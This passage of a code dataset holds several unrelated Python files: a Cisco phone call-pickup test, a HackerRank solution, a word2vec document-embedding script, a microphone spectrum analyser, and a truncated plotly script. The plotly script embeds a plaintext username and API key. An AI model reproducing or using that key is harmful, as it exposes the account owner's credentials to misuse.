章所需资料/6excel_value_matches_pattern.py","file_name":"6excel_value_matches_pattern.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"594862933","text":"#!/usr/bin/env python\n\"\"\"\nScript Header\n\n$Id:cmCC23986_3pcc_BLF_CallPickup_StarCode_CallerNumber\n\nCopyright (c) 2016-2017 Cisco Systems, Inc.\n\nName:\n cmCC23986_3pcc_BLF_CallPickup_StarCode_CallerNumber.py\n\nPurpose:\n To test if the caller number is displayed correctly (without star code) for\n BLF call pickup\n\nAuthor:\n Anuradha N(anakre@cisco.com)\n\nReferences:\n CSCva92839\n US23986\n\nDescription:\n Configure BLF - speed dial in the monitoring phone from the 'Extended\n Function' field in Phone tab. Call monitored user from Phone C and then\n try call pickup from monitoring user by pressing line key for monitored\n user. Check for call state and blf state. And also verify if the caller\n number is displayed without star code on LCD.\n\nTopology:\n 1. 3 3pcc phones.\n 2. All the phones should register successfully before running the script\n 3. BLF should be configured on monitoring user phone.\n\nPass/Fail Criteria:\n 1. Monitoring should be able to initiate call pickup by pressing the line\n key corresponding to the monitored user which is in ringing state.\n 2. After initiating call pickup proper name and number should be\n displayed in the Monitoring phone\n\nTest Steps:\n 1. Create a blf list uri and add monitored users in the BS server.\n 2. Disable extension 2 of DUT from phone webpage and set the blf\n function in the 'Extended Function' field for Line Key 2.\n syntax = fnc=blf+cp;sub=blf_listuriname@$PROXY;usr=monitored_userid\n @$PROXY\n 3. Then dial from Phone C to the monitored user (Phone B)\n 4. Do not answer the call\n 5. Check if the BLF state of Phone B in DUT is set to ALERTING\n 6. Initiate call pick up from DUT(Phone A) by pressing the line key\n corresponding to the monitored user.\n 7. Phone B stops ringing and Phone A and Phone C are connected\n 8. Check that LCD displays the Phone C name and number. (without star code)\n 9. Check that blf state in DUT for Phone B is shown as IDLE\n 10. Disconnect the call and verify that all phones are idle\n\nNotes:\n\nKnown Bugs:\n\n\"\"\"\nimport tng\nimport logging\nfrom tng_sl.contrib.mpp.Toolkit3pcc import Toolkit3pcc\nfrom tng.api import concurrent\nfrom tng_sl.device.endpoint.synergylite.synergylite_3pcc_extended \\\n import wait_for_ccapi_call_states, register_lines, poll_feature_state\nfrom tng.frontend.timing import wait\nfrom tng_sl.contrib.setup_helper import SetupHelpersTestCase\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneLineRegHelper\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneConfigHelper\n\nfrom tng_sl.contrib.mpp.broadsoft.BroadsoftWebToolkit\\\n import BroadsoftWebToolkit\nfrom tng_sl.plugins.synergylite_3pcc_ui import SynergyLite3pccUiHelper\n\nlog = logging.getLogger('BlfCallPickup')\n\n\nclass BlfCallPickup(SetupHelpersTestCase, tng.api.TestCase):\n\n helpers = (PhoneConfigHelper, PhoneLineRegHelper)\n helper_num_devices = 3\n\n @classmethod\n def setUpClass(cls):\n log.info(\"Start of setUpClass\")\n\n cls.proxy = cls.phone_data['proxy']\n\n log.info(\"Enable busy lamp field in the server\")\n bsoft_data = cls.toolkit.get_test_env_info(\n section='bsoft')\n bsoft_url = bsoft_data['web_url']\n cls.bsoft_web = BroadsoftWebToolkit(bsoft_url)\n cls.bsoft_ip_addr = bsoft_data['as_ip_addr']\n group_admin = bsoft_data['group_admin_id1']\n pswd = bsoft_data['group_admin_password1']\n cls.bsoft_web.login(group_admin, pswd)\n cls.blf_list_uri = cls.bsoft_web.create_blf_listuri(\n cls.user_id1, [cls.user_id2], cls.proxy)\n cls.bsoft_user_id2 = cls.bsoft_web.get_user_id(\n 'group admin', cls.user_id2)\n cls.p2_fname, cls.p2_lname = cls.bsoft_web.get_first_and_last_name(\n account_type=\"group admin\", user_phone_num=cls.user_id3)\n\n def delete_blf_list():\n cls.bsoft_web.delete_blf_listuri(cls.user_id1)\n cls.bsoft_web.close_web_page()\n\n cls.addCleanupClass(delete_blf_list)\n\n log.info(\"End of setUpClass\")\n\n def test_blf_callpickup_ext_function(self):\n\n log.info(\"Start of test_blf_callpickup_ext_function\")\n\n linenum = self.oPhone1.get_phone_line_total_number()\n if linenum <= 1:\n self.skipTest(\"Phone only has one line, it can't be set BLF\")\n\n log.info(\"Set blf callpickup function in the extended function field\")\n uri_name = '{}@{}'.format(self.blf_list_uri, self.proxy)\n blf_fnc = 'fnc=blf+sd+cp;sub={};usr={}@{}'.format(\n uri_name, self.bsoft_user_id2, self.proxy)\n\n self.oPhone1.ui.set_web_parameter_by_resync(\n Ext_Func_2=['Extended_Function_2_', blf_fnc],\n Extension_2=['Extension_2_', 'Disabled'])\n\n config_parm1 = self.oPhone1.get_web_config(\n 'Extended_Function_2_', 'Extension_2_')\n\n self.assertEqual(\n config_parm1[0], blf_fnc,\n \"BLF function not set in Extended function field\")\n self.assertEqual(\n config_parm1[1], \"Disabled\", \"Extension 2 is not disabled\")\n caller_name = '{} {}'.format(self.p2_fname, self.p2_lname)\n\n self.oPhone1.register_call_event('VOIP_MSG_CALL_EVENT_SHARE')\n self.oPhone1.ccapi.feedback_subscribe(self.oPhone1.subscribed_callback)\n log.info(\"Phone C dials Phone B's number\".format(self.user_id2))\n self.oPhone3.ccapi.dial('null', self.user_id2, '', 1, 0, 1)\n\n # check phoneC ringout status and PhoneB ringing status\n wait_for_ccapi_call_states(\n self.devices, (\"IDLE\", \"RINGING\", \"PROCEEDING\"), timeout=20)\n # check BLF State Alerting on Phone A\n poll_feature_state(\n self.oPhone1, 2, ['State'], expected_state=['ALERTING'])\n\n log.info(\"Phone A press the line key to initiate call pick up\")\n self.oPhone1.ccapi.sendKey(SynergyLite3pccUiHelper.PK_LN2, 1, '0000')\n # check phoneA and PhoneC connected status\n wait_for_ccapi_call_states(\n self.devices, (\"CONNECTED\", \"IDLE\", \"CONNECTED\"), timeout=20)\n # check BLF State IDLE on Phone A\n poll_feature_state(self.oPhone1, 2, ['State'], expected_state=['IDLE'])\n\n call_name = self.oPhone1.ui.get_param_value('Peer Name')\n call_num = self.oPhone1.ui.get_param_value('Peer Phone')\n self.assertEqual(caller_name, call_name)\n self.assertEqual(self.user_id3[-4:], call_num)\n\n self.oPhone1.ccapi.feedback_unsubscribe(\n self.oPhone1.subscribed_callback)\n wait(10, 'Wait for 10s when phones are in connected state')\n\n log.info(\"Phone C ends the call\")\n self.oPhone3.ccapi.hangUp('0000')\n # check IDLE status for all phones\n wait_for_ccapi_call_states(\n self.devices, (\"IDLE\", \"IDLE\", \"IDLE\"), timeout=20)\n # check BLF State IDLE on Phone A\n poll_feature_state(self.oPhone1, 2, ['State'], expected_state=['IDLE'])\n self.oPhone1.unregister_call_event('VOIP_MSG_CALL_EVENT_SHARE')\n\n\n# this is called by 'tng run'\ndef main():\n tng.api.runner()\n\nif __name__ == '__main__':\n tng.run(main)\n","sub_path":"common/CFD/call_control/cmCC23986_3pcc_BLF_CallPickup_StarCode_CallerNumber.py","file_name":"cmCC23986_3pcc_BLF_CallPickup_StarCode_CallerNumber.py","file_ext":"py","file_size_in_byte":7144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"493819197","text":"#!/bin/python\n\nimport sys\n\ndef birthdayCakeCandles(n, ar):\n maximum = None\n n_maximum = 0\n\n # It is kept track the maximum number and the number of times it has appeared\n for number in ar:\n if not maximum or number > maximum:\n maximum = number\n n_maximum = 1\n elif maximum == number:\n n_maximum = n_maximum + 1\n\n return n_maximum\n\nn = int(raw_input().strip())\nar = map(int, raw_input().strip().split(' '))\n\nresult = birthdayCakeCandles(n, ar)\nprint(result)\n","sub_path":"warmup/birthday-cake-candles.py","file_name":"birthday-cake-candles.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"172682792","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 2019/10/30 下午5:25\n# @Author : Aries\n# @Site : \n# @File : document_emebedding.py\n# @Software: PyCharm\n'''对文档进行分类'''\n\nfrom __future__ import print_function\nimport collections\nimport csv\nimport math\nimport numpy as np\nimport os\nimport random\nimport tensorflow as tf\nimport zipfile\nfrom matplotlib import pylab\nfrom six.moves import range\nfrom six.moves.urllib.request import urlretrieve\nfrom sklearn.manifold import TSNE\nfrom sklearn.cluster import KMeans\nimport nltk # standard preprocessing\nimport operator # sorting items in dictionary by value\n# nltk.download() #tokenizers/punkt/PY3/english.pickle\nfrom math import ceil\n\nfile = \"/Users/houruixiang/python/tensorflow_nlp_master/Senior_Word2vec/dataset/bbc-fulltext.zip\"\n# nltk.download('punkt')\nvocabulary_size = 25000 # 词汇表中有25000个单词\ndata_index = 0\ntest_data_index = 0\n\n\ndef read_data(file):\n\tdata = []\n\tfiles_to_read_for_topic = 250\n\ttopics = ['business', 'entertainment', 'politics', 'sport', 'tech']\n\twith zipfile.ZipFile(file=file) as f:\n\t\tparent_dir = f.namelist()[0]\n\t\t# 遍历类别\n\t\tfor t in topics:\n\t\t\tprint('\\tFinished reading data for topic: ', t)\n\t\t\t# 遍历文档\n\t\t\tfor fi in range(1, files_to_read_for_topic):\n\t\t\t\twith f.open(parent_dir + t + '/' + format(fi, '03d') + '.txt') as f2:\n\t\t\t\t\tfile_string = f2.read().decode('latin-1')\n\t\t\t\t\tfile_string = file_string.lower()\n\t\t\t\t\tfile_string = nltk.word_tokenize(file_string)\n\t\t\t\t\tdata.extend(file_string)\n\t\t# 12250\n\t\treturn data\n\n\ndef read_test_data(file):\n\ttest_data = {}\n\tfiles_to_read_for_topic = 250\n\ttopics = ['business', 'entertainment', 'politics', 'sport', 'tech']\n\twith zipfile.ZipFile(file=file) as f:\n\t\tparent_dir = f.namelist()[0]\n\t\tfor t in topics:\n\t\t\tprint('\\tFinished reading data for topic: ', t)\n\t\t\tfor fi in np.random.randint(1, files_to_read_for_topic, (10)).tolist():\n\t\t\t\twith f.open(parent_dir + t + '/' + format(fi, '03d') + '.txt') as f2:\n\t\t\t\t\tfile_string = f2.read().decode('latin-1')\n\t\t\t\t\tfile_string = file_string.lower()\n\t\t\t\t\tfile_string = nltk.word_tokenize(file_string)\n\t\t\t\t\ttest_data[t + '_' + str(fi)] = file_string\n\t\t# 50\n\t\treturn test_data\n\n\ndef build_dataset(words):\n\t'''\n\tcreate a dict:\n\t1.maps a string word to an ID & maps an ID to a string word\n\t2.List of list of (word,frequency)elements(eg.[(I,1),(to,2)...])\n\t3.Contain the string of text we read,where string words are replaced with word IDs\n\t:param words:\n\t:return:\n\t\tdata: list [[id]]\n\t\tcount: list [[word,freq]]\n\t\tdictionary: dict [[word,id]]\n\t\treverse_dictionary [[id,word]]\n\t'''\n\tcount = [['UNK', -1]]\n\t# collections.Counter(words)计算words中的单词频率\n\t# .most_common(vocabulary_size - 1)输出排序之后频率最高的25000个词\n\tcount.extend(collections.Counter(words).most_common(vocabulary_size - 1)) # 25000\n\t\n\t# 创建快速查询\n\tdictionary = dict()\n\tfor word, _ in count:\n\t\tdictionary[word] = len(dictionary)\n\t\n\tdata = list()\n\tunk_count = 0\n\tfor word in words:\n\t\tif word in dictionary:\n\t\t\tindex = dictionary[word]\n\t\telse:\n\t\t\t# dictionary['UNK']\n\t\t\tindex = 0\n\t\t\tunk_count = unk_count + 1\n\t\tdata.append(index)\n\t\n\t# update the count variable with the number of UNK occurences\n\tcount[0][1] = unk_count\n\treverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n\treturn data, count, dictionary, reverse_dictionary\n\n\ndef build_dataset_with_existing_dictionary(words, dictionary):\n\t'''\n\t\n\t:param words:\n\t:param dictionary:\n\t:return:\n\t'''\n\tdata = list()\n\tfor word in words:\n\t\tif word in dictionary:\n\t\t\tindex = dictionary[word]\n\t\telse:\n\t\t\tindex = 0\n\t\tdata.append(index)\n\treturn data\n\n\n'''Generating Batches of Data for Skip-Gram'''\n\n\ndef generate_batch(data, batch_size, window_size):\n\t# window_size is the amount of words we're looking at from each side of a given word\n\t# creates a single batch\n\t\n\t# data_index is updated by 1 everytime we read a set of data point\n\tglobal data_index\n\t\n\t# span defines the total window size, where\n\t# data we consider at an instance looks as follows.\n\t# [ skip_window target skip_window ]\n\t# e.g if skip_window = 2 then span = 5\n\tspan = 2 * window_size + 1 # [ skip_window target skip_window ]\n\t\n\t# two numpy arras to hold target words (batch)\n\t# and context words (labels)\n\t# Note that batch has span-1=2*window_size columns\n\tbatch = np.ndarray(shape=(batch_size, span - 1), dtype=np.int32)\n\tlabels = np.ndarray(shape=(batch_size, 1), dtype=np.int32)\n\t\n\t# The buffer holds the data contained within the span\n\tbuffer = collections.deque(maxlen=span)\n\t\n\t# Fill the buffer and update the data_index\n\t# 初始填充buffer\n\tfor _ in range(span):\n\t\tbuffer.append(data[data_index])\n\t\tdata_index = (data_index + 1) % len(data)\n\t\n\tnum_samples = 2 * window_size\n\t# Here we do the batch reading\n\t# We iterate through each batch index\n\t# For each batch index, we iterate through span elements\n\t# to fill in the columns of batch array\n\tfor i in range(batch_size):\n\t\tk = 0\n\t\t# avoid the target word itself as a prediction\n\t\t# fill in batch and label numpy arrays\n\t\tfor j in range(span):\n\t\t\tif j == span // 2:\n\t\t\t\tcontinue\n\t\t\tbatch[i, k] = buffer[j]\n\t\t\tk += 1\n\t\tlabels[i, 0] = buffer[window_size]\n\t\t\n\t\t# Everytime we read num_samples data points,\n\t\t# we have created the maximum number of datapoints possible\n\t\t# withing a single span, so we need to move the span by 1\n\t\t# to create a fresh new span\n\t\tbuffer.append(data[data_index])\n\t\tdata_index = (data_index + 1) % len(data)\n\t\n\tassert batch.shape[0] == batch_size and batch.shape[1] == span - 1\n\treturn batch, labels\n\n\ndef generate_test_batch(data, batch_size):\n\tglobal test_data_index\n\tbatch = np.ndarray(shape=(batch_size), dtype=np.int32)\n\ttry:\n\t\tfor bi in range(batch_size):\n\t\t\tbatch[bi] = data[test_data_index]\n\t\t\ttest_data_index = (test_data_index + 1) % len(data)\n\texcept:\n\t\ts = 10\n\treturn batch\n\n\ndef plot(embeddings, labels):\n\tn_clusters = 5 # number of clusters\n\t\n\t# automatically build a discrete set of colors, each for cluster\n\t# 0-o 1-^ 2-d 3-s 4-x\n\tlabel_markers = ['o', '^', 'd', 's', 'x']\n\t# make sure the number of document embeddings is same as\n\t# point labels provided\n\tassert embeddings.shape[0] >= len(labels), 'More labels than embeddings'\n\t\n\tpylab.figure(figsize=(15, 15)) # in inches\n\t\n\tdef get_label_id_from_key(key):\n\t\t'''\n\t\tWe assign each different category a cluster_id\n\t\tThis is assigned based on what is contained in the point label\n\t\tNot the actual clustering results\n\t\t'''\n\t\tif 'business' in key:\n\t\t\treturn 0\n\t\telif 'entertainment' in key:\n\t\t\treturn 1\n\t\telif 'politics' in key:\n\t\t\treturn 2\n\t\telif 'sport' in key:\n\t\t\treturn 3\n\t\telif 'tech' in key:\n\t\t\treturn 4\n\t\n\t# Plot all the document embeddings and their corresponding words\n\tfor i, label in enumerate(labels):\n\t\tx, y = embeddings[i, :]\n\t\tpylab.scatter(x, y, s=50,\n\t\t marker=label_markers[get_label_id_from_key(label)])\n\t\t\n\t\t# Annotate each point on the scatter plot\n\t\tpylab.annotate(label, xy=(x, y), xytext=(5, 2), textcoords='offset points',\n\t\t ha='right', va='bottom', fontsize=16)\n\t\n\t# Set plot title\n\tpylab.title('Document Embeddings visualized with t-SNE', fontsize=24)\n\t\n\t# Use for saving the figure if needed\n\tpylab.savefig('./dataset/document_embeddings.png')\n\tpylab.show()\n\n\ndef main():\n\tprint('Processing training data...')\n\twords = read_data(file)\n\tprint('\\nProcessing testing data...')\n\ttest_words = read_test_data(file)\n\t\n\tdata, count, dictionary, reverse_dictionary = build_dataset(words)\n\ttest_data = {}\n\tfor k, v in test_words.items():\n\t\tprint('Building Test Dataset for ', k, ' topic')\n\t\ttest_data[k] = build_dataset_with_existing_dictionary(test_words[k], dictionary)\n\t\n\tbatch_size = 128 # Data points in a single batch\n\tembedding_size = 128 # Dimension of the embedding vector.\n\twindow_size = 4 # How many words to consider left and right.\n\t\n\t# We pick a random validation set to sample nearest neighbors\n\tvalid_size = 16 # Random set of words to evaluate similarity on.\n\t# We sample valid datapoints randomly from a large window without always being deterministic\n\tvalid_window = 50\n\t\n\t# When selecting valid examples, we select some of the most frequent words as well as\n\t# some moderately rare words as well\n\t# (32,)\n\tvalid_examples = np.array(random.sample(range(valid_window), valid_size))\n\tvalid_examples = np.append(valid_examples, random.sample(range(1000, 1000 + valid_window), valid_size), axis=0)\n\t\n\t# 负样本\n\tnum_sampled = 32 # Number of negative examples to sample.\n\t\n\ttf.reset_default_graph()\n\t\n\t# Training input data (target word IDs).\n\ttrain_dataset = tf.placeholder(tf.int32, shape=[batch_size, 2 * window_size])\n\t\n\t# Training input label data (context word IDs)\n\ttrain_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])\n\t\n\t# Validation input data, we don't need a placeholder\n\t# as we have already defined the IDs of the words selected\n\t# as validation data used to evaluate the word vectors\n\tvalid_dataset = tf.constant(valid_examples, dtype=tf.int32)\n\t\n\t# Test data. This is used to compute the document embeddings by averaging\n\t# word embeddings of a given document\n\ttest_labels = tf.placeholder(tf.int32, shape=[batch_size], name='test_dataset')\n\t\n\tembeddings = tf.Variable(tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0, dtype=tf.float32))\n\tsoftmax_weights = tf.Variable(tf.truncated_normal([vocabulary_size, embedding_size],\n\t stddev=1.0 / math.sqrt(embedding_size), dtype=tf.float32))\n\tsoftmax_biases = tf.Variable(tf.zeros([vocabulary_size], dtype=tf.float32))\n\t\n\t# Used to compute document embeddings by averaging all the word vectors of a\n\t# given batch of broadcast data\n\t\n\t# Used to compute document embeddings by averaging all the word vectors of a\n\t# given batch of broadcast data\n\t# 用于计算文档嵌入,方法是平均给定的一批测试数据\n\tmean_batch_embedding = tf.reduce_mean(tf.nn.embedding_lookup(embeddings, test_labels), axis=0)\n\t\n\t# Model.\n\t# Look up embeddings for all the context words of the inputs.\n\t# Then compute a tensor by staking embeddings of all context words\n\tstacked_embedings = None\n\tprint('Defining %d embedding lookups representing each word in the context' % (2 * window_size))\n\tfor i in range(2 * window_size):\n\t\tembedding_i = tf.nn.embedding_lookup(embeddings, train_dataset[:, i])\n\t\tx_size, y_size = embedding_i.get_shape().as_list()\n\t\tif stacked_embedings is None:\n\t\t\tstacked_embedings = tf.reshape(embedding_i, [x_size, y_size, 1])\n\t\telse:\n\t\t\tstacked_embedings = tf.concat(axis=2,\n\t\t\t values=[stacked_embedings, tf.reshape(embedding_i, [x_size, y_size, 1])])\n\t\n\t# Make sure the staked embeddings have 2*window_size columns\n\tassert stacked_embedings.get_shape().as_list()[2] == 2 * window_size\n\tprint(\"Stacked embedding size: %s\" % stacked_embedings.get_shape().as_list())\n\t\n\t# Compute mean embeddings by taking the mean of the tensor containing the stack of embeddings\n\tmean_embeddings = tf.reduce_mean(stacked_embedings, 2, keepdims=False)\n\tprint(\"Reduced mean embedding size: %s\" % mean_embeddings.get_shape().as_list())\n\t\n\tloss = tf.reduce_mean(\n\t\ttf.nn.sampled_softmax_loss(weights=softmax_weights, biases=softmax_biases, inputs=mean_embeddings,\n\t\t labels=train_labels, num_sampled=num_sampled, num_classes=vocabulary_size))\n\t\n\t# Compute the similarity between minibatch examples and all embeddings.\n\t# We use the cosine distance:\n\tnorm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keepdims=True))\n\tnormalized_embeddings = embeddings / norm\n\tvalid_embeddings = tf.nn.embedding_lookup(normalized_embeddings, valid_dataset)\n\tsimilarity = tf.matmul(valid_embeddings, tf.transpose(normalized_embeddings))\n\t\n\t# Optimizer. Adagrad optimizers has learning rates assigned to individual parameters\n\toptimizer = tf.train.AdagradOptimizer(1.0).minimize(loss)\n\t\n\tnum_steps = 100001\n\tcbow_loss = []\n\t\n\twith tf.Session() as session:\n\t\t\n\t\t# Initialize the variables in the graph\n\t\ttf.global_variables_initializer().run()\n\t\tprint('Initialized')\n\t\t\n\t\taverage_loss = 0\n\t\t\n\t\t# Train the Word2vec model for num_step iterations\n\t\tfor step in range(num_steps):\n\t\t\t\n\t\t\t# Generate a single batch of data\n\t\t\tbatch_data, batch_labels = generate_batch(data, batch_size, window_size)\n\t\t\t\n\t\t\t# Populate the feed_dict and run the optimizer (minimize loss)\n\t\t\t# and compute the loss\n\t\t\tfeed_dict = {train_dataset: batch_data, train_labels: batch_labels}\n\t\t\t_, l = session.run([optimizer, loss], feed_dict=feed_dict)\n\t\t\t\n\t\t\t# Update the average loss variable\n\t\t\taverage_loss += l\n\t\t\t\n\t\t\tif (step + 1) % 2000 == 0:\n\t\t\t\tif step > 0:\n\t\t\t\t\taverage_loss = average_loss / 2000\n\t\t\t\t# The average loss is an estimate of the loss over the last 2000 batches.\n\t\t\t\tprint('Average loss at step %d: %f' % (step + 1, average_loss))\n\t\t\t\tcbow_loss.append(average_loss)\n\t\t\t\taverage_loss = 0\n\t\t\t\n\t\t\t# Evaluating validation set word similarities\n\t\t\tif (step + 1) % 10000 == 0:\n\t\t\t\tsim = similarity.eval()\n\t\t\t\t# Here we compute the top_k closest words for a given validation word\n\t\t\t\t# in terms of the cosine distance\n\t\t\t\t# We do this for all the words in the validation set\n\t\t\t\t# Note: This is an expensive step\n\t\t\t\tfor i in range(valid_size):\n\t\t\t\t\tvalid_word = reverse_dictionary[valid_examples[i]]\n\t\t\t\t\ttop_k = 8 # number of nearest neighbors\n\t\t\t\t\tnearest = (-sim[i, :]).argsort()[1:top_k + 1]\n\t\t\t\t\tlog = 'Nearest to %s:' % valid_word\n\t\t\t\t\tfor k in range(top_k):\n\t\t\t\t\t\tclose_word = reverse_dictionary[nearest[k]]\n\t\t\t\t\t\tlog = '%s %s,' % (log, close_word)\n\t\t\t\t\tprint(log)\n\t\tfinal_embedings = normalized_embeddings.eval()\n\t\tnp.save('./res/document_embedding', final_embedings)\n\t\twith open('./res/document_losses.csv', 'wt') as f:\n\t\t\twriter = csv.writer(f, delimiter=',')\n\t\t\twriter.writerow(cbow_loss)\n\t\t# Computing broadcast documents embeddings by averaging word embeddings\n\t\t\n\t\t# We take batch_size*num_test_steps words from each document\n\t\t# to compute document embeddings\n\t\tnum_test_steps = 100\n\t\t\n\t\t# Store document embeddings\n\t\t# {document_id:embedding} format\n\t\tdocument_embeddings = {}\n\t\tprint('Testing Phase (Compute document embeddings)')\n\t\t\n\t\t# For each broadcast document compute document embeddings\n\t\tfor k, v in test_data.items():\n\t\t\tprint('\\tCalculating mean embedding for document ', k, ' with ', num_test_steps, ' steps.')\n\t\t\tglobal test_data_index\n\t\t\ttest_data_index = 0\n\t\t\ttopic_mean_batch_embeddings = np.empty((num_test_steps, embedding_size), dtype=np.float32)\n\t\t\t\n\t\t\t# keep averaging mean word embeddings obtained for each step\n\t\t\tfor test_step in range(num_test_steps):\n\t\t\t\ttest_batch_labels = generate_test_batch(test_data[k], batch_size)\n\t\t\t\tbatch_mean = session.run(mean_batch_embedding, feed_dict={test_labels: test_batch_labels})\n\t\t\t\ttopic_mean_batch_embeddings[test_step, :] = batch_mean\n\t\t\tdocument_embeddings[k] = np.mean(topic_mean_batch_embeddings, axis=0)\n\t\t\n\t\t\n\t\t# Create a t-SNE object\n\t\ttsne = TSNE(perplexity=30, n_components=2, init='pca', n_iter=5000)\n\t\t\n\t\tprint('Fitting embeddings to T-SNE')\n\t\t# get the T-SNE manifold\n\t\tdoc_ids, doc_embeddings = zip(*document_embeddings.items())\n\t\ttwo_d_embeddings = tsne.fit_transform(doc_embeddings)\n\t\tprint('\\tDone')\n\t\t\n\t\t# Run the plotting function\n\t\tplot(two_d_embeddings, doc_ids)\n\t\t\n\t\tprint('-------------------------------perform document classification------------------------------')\n\t\tkmeans = KMeans(n_clusters=5, random_state=43643, max_iter=10000, n_init=100, algorithm='elkan')\n\t\tkmeans.fit(np.array(list(document_embeddings.values())))\n\t\t\n\t\t# Compute items fallen within each cluster\n\t\tdocument_classes = {}\n\t\tfor inp, lbl in zip(list(document_embeddings.keys()), kmeans.labels_):\n\t\t\tif lbl not in document_classes:\n\t\t\t\tdocument_classes[lbl] = [inp]\n\t\t\telse:\n\t\t\t\tdocument_classes[lbl].append(inp)\n\t\tfor k, v in document_classes.items():\n\t\t\tprint('\\nDocuments in Cluster ', k)\n\t\t\tprint('\\t', v)\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"Senior_Word2vec/document_emebedding.py","file_name":"document_emebedding.py","file_ext":"py","file_size_in_byte":15838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"624825194","text":"'''\n* скрипт накапливает данные с микрофона, после чего рассчитывает спектр,\nосреднённый по амплитудам\n* изначально планировалось вычленять из спектра доминирующие частоты, однако,\nв итоге осталась только задача зрительного анализа спектра\n* сигнал, сразу после получения, даунсемплится 1) для уменьшения числа\nвычислений 2) т.к. частоты выше килогерца меня не интересуют 3) т.к. низкий\nбитрейт позволяет получить более высокое разрешение преобразования Фурье\nна низких частотах (из коробки, без плясок с бубном)\n* можно включить/выключить анимацию, предварительно уменьшив (раз в 10) размеры\nбуфера и стека\n* структура данных выглядит так:\n┌ block ┐\n│ block │ buffer ┐\n│ block │ buffer │ stack\n│ block │ ... ┘\n└ ... ┘\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport scipy.io.wavfile\nimport scipy.signal\nimport sounddevice as sd\n\ndevicenumber = 1 # номер микрофона sd.query_devices()\n\nbitrate = 44100 # этот (и никакой другой) битрейт выдает мой микрофон\ndownsamplerate = 10 # даунсемплинг (методом децимации), в n раз\nblocksize = 4410 # величина блока, забираемого из потока (на значениях более\n# 20000 появляются nan)\nbuffersize = 10 # величина буфера (в блоках)\nstacksize = 12 # величина стека (в буферах), стек осредняется\n\nprint(blocksize * buffersize * stacksize / bitrate) # с, чистое время сбора\n# с учетом вычислений, можно умножать на 2\n\n# данные для a-weighting\naw_data = np.array((6.3, -85.4,\n 6.3, -85.4,\n 8, -77.8,\n 10, -70.4,\n 12.5, -63.4,\n 16, -56.7,\n 20, -50.5,\n 25, -44.7,\n 31.5, -39.4,\n 40, -34.6,\n 50, -30.2,\n 63, -26.2,\n 80, -22.5,\n 100, -19.1,\n 125, -16.1,\n 160, -13.4,\n 200, -10.9,\n 250, -8.6,\n 315, -6.6,\n 400, -4.8,\n 500, -3.2,\n 630, -1.9,\n 800, -0.8,\n 1000, 0,\n 1250, 0.6,\n 1600, 1,\n 2000, 1.2,\n 2500, 1.3,\n 3150, 1.2,\n 4000, 1,\n 5000, 0.5,\n 6300, -0.1,\n 8000, -1.1,\n 10000, -2.5,\n 12500, -4.3,\n 16000, -6.6,\n 20000, -9.3))\naw = aw_data[::2], aw_data[1:][::2] # получение 2х столбцов данных\n\n# Соотношения децибелов и амплитуд (для звуковых колебаний)\n# GdB = 20log_10(A2/A1) # 20 -- это вылезает квадрат из под логарифма\n# A2 = A1 * 10**(Gdb/20)\n\ndef abydb(A1, Gdb):\n '''\n изменение амплитуды в соответствии с коэффициентом усиления\n '''\n A2 = A1 * 10**(Gdb / 20)\n return A2\n\n# заготовки для отрисовки\nfig = plt.figure()\nxlim = (1e1, 1e4)\nylim = (1e-9, 1e4)\nax = plt.axes(xlim=xlim, ylim=ylim, xscale='log', yscale='log')\npoints = ax.plot([], [], marker='.')[0]\n\ndef f():\n stack = np.array(())\n\n for j in range(stacksize):\n buffer = np.zeros((buffersize, blocksize//downsamplerate))\n\n for i in range(buffersize):\n def callback(indata, frames, time, status): # получение и даунсемплинг сигнала\n dsblock = scipy.signal.decimate(indata.T[0], downsamplerate)\n buffer[i].put(np.arange(dsblock.size), dsblock)\n with sd.InputStream(device=devicenumber, callback=callback, #\n blocksize=blocksize, channels=1):\n sd.sleep(int(blocksize / bitrate * 1000 + 42)) # 42 мс про запас\n print(j, i, end='\\t') # \"прогрессбар\"\n\n spec = np.abs(np.fft.fft(buffer.flatten()))**2 # мощность сигнала\n freq = np.fft.fftfreq(buffer.flatten().size, 1/(bitrate/downsamplerate)) # сетка частот\n idx = np.argwhere((freq > 13.75) & (freq < 500000)) # отсечка хлама\n spec_cut = spec[idx]\n freq_cut = freq[idx]\n spec_cut_aw = abydb(spec_cut, np.interp(freq_cut, aw[0], aw[1])) # A-weighting\n stack = np.append(stack, spec_cut_aw.flatten())\n\n points.set_data(freq_cut, np.mean(stack.reshape(stacksize, -1), 0))\n\n# нижеследующий костыль организован для того, чтобы перекомментируя f()\n# можно было включать анимацию для небольших значений времени сбора данных\n\nf() ###\ndef animate(i):\n# f() ###\n pass\nfps = 10\nanim = animation.FuncAnimation(fig, animate, frames=42, interval=1000/fps)\n","sub_path":"soundmax/sdm 1.3 190410-2104.py","file_name":"sdm 1.3 190410-2104.py","file_ext":"py","file_size_in_byte":5827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"427707113","text":"# plotly visualisation\n\"\"\"\nCreated on Thu Mar 21 15:25:28 2019\n\n@author: Eleanor\n\"\"\"\nimport plotly\nplotly.tools.set_credentials_file(username='eleanor1357', api_key='oB200N0KGmaub83XuktV')\nplotly.tools.set_config_file(world_readable=True,\n sharing='public')\nimport plotly.plotly as py\nimport plotly.figure_factory as ff\nimport plotly.graph_objs as go\nfrom skimage import measure\nimport numpy as np\nimport time\nimport nibabel as nib\nfrom sklearn.preprocessing import MinMaxScaler\nfrom matplotlib import cm\n \n\n\n\ntStart = time.time();\nnp.set_printoptions(precision=4, suppress=True);\n############################## load data ########################\n#mag_pca_result_cube = 